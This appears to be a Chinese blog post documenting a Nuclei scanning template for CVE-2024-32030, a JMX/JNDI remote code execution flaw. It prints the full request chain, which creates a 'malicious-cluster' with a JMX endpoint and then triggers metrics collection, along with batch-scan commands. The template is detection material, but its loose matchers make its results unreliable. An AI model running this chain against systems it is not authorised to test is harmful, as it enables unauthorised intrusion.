CVE-2024-32030 JMX远程代码执行检测模板

qife122
3 阅读3分钟

CVE-2024-32030 Nuclei 漏洞检测模板

本项目提供一个专业的 Nuclei 安全扫描模板,用于检测 CVE-2024-32030 漏洞。该漏洞影响启用 JMX(Java Management Extensions)指标收集的系统,攻击者可通过 JNDI 解析实现远程代码执行(RCE),对系统安全构成严重威胁。

功能特性

  • 精准检测:通过构造恶意 JMX 服务器连接请求,验证目标系统是否存在 CVE-2024-32030 漏洞
  • 多阶段验证:包含集群创建、状态查询和指标获取三个递进步骤,确保检测结果的可靠性
  • 关键等级:标记为严重(Critical)级别漏洞,提醒用户优先处理
  • Nuclei 集成:完全兼容 Nuclei 扫描引擎,支持批量扫描和自动化工作流

安装指南

前置要求

  • Nuclei 扫描引擎(v2.7.0 或更高版本) 
    # 安装 Nuclei(如未安装)
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest

安装模板

  1. 将模板文件保存为 cve-2024-32030.yaml
curl -O https://raw.githubusercontent.com/your-repo/CVE-2024-32030/main/cve-2024-32030.yaml
  1. (可选)将模板添加到 Nuclei 模板库
cp cve-2024-32030.yaml ~/nuclei-templates/cves/2024/

使用说明

基础用法

对单个目标运行漏洞检测:

nuclei -t cve-2024-32030.yaml -u http://target-server:port

批量扫描

对多个目标进行扫描:

nuclei -t cve-2024-32030.yaml -l targets.txt

输出结果

# 保存结果到 JSON 文件
nuclei -t cve-2024-32030.yaml -u http://target-server -json -o results.json

# 详细输出模式
nuclei -t cve-2024-32030.yaml -u http://target-server -debug

检测流程说明

该模板执行三个顺序请求来验证漏洞:

  1. 创建恶意集群:POST /api/clusters 构造包含 JMX 端点的集群配置
  2. 验证集群存在:GET /api/clusters/malicious-cluster 确认集群创建成功
  3. 触发 JMX 连接:GET /api/clusters/malicious-cluster/metrics 尝试获取指标,触发 JNDI 解析

核心代码

模板完整定义

id: CVE-2024-32030

info:
  name: CVE-2024-32030 JMX Metrics Collection JNDI RCE
  author: Hüseyin TINTAŞ
  severity: critical
  description: >
    CVE-2024-32030 JMX Metrics Collection JNDI Resolution Remote Code Execution Vulnerability.
    This template checks for the presence of the vulnerability by attempting to connect to a malicious JMX server.
  tags: cve, cve2024, jmx, rce, cve2024-32030

requests:
  - method: POST
    path:
      - "{{BaseURL}}/api/clusters"
    headers:
      Content-Type: "application/json"
    body: |
      {
        "name": "malicious-cluster",
        "bootstrapServers": ["127.0.0.1:1718"],
        "metrics": {
          "type": "JMX",
          "port": 1718
        }
      }
    matchers:
      - type: word
        part: body
        words:
          - "malicious-cluster added successfully"

  - method: GET
    path:
      - "{{BaseURL}}/api/clusters/malicious-cluster"
    matchers:
      - type: word
        part: body
        words:
          - "malicious-cluster"

  - method: GET
    path:
      - "{{BaseURL}}/api/clusters/malicious-cluster/metrics"
    matchers:
      - type: word
        part: body
        words:
          - "metrics"

关键组件说明

组件功能实现方式
info 区块漏洞元数据定义包含名称、作者、严重等级、描述和标签
requests 数组多步骤请求链依次执行 POST 和 GET 请求,模拟攻击路径
body 载荷恶意 JMX 配置构造指向本地恶意 JMX 服务器(127.0.0.1:1718)的配置
matchers响应匹配规则通过关键字匹配判断漏洞是否存在
6HFtX5dABrKlqXeO5PUv//nOP4c9MjVTsPanYa5R9O8zHuQTxQljCR4x588SEmed
avatar
文章
阅读
粉丝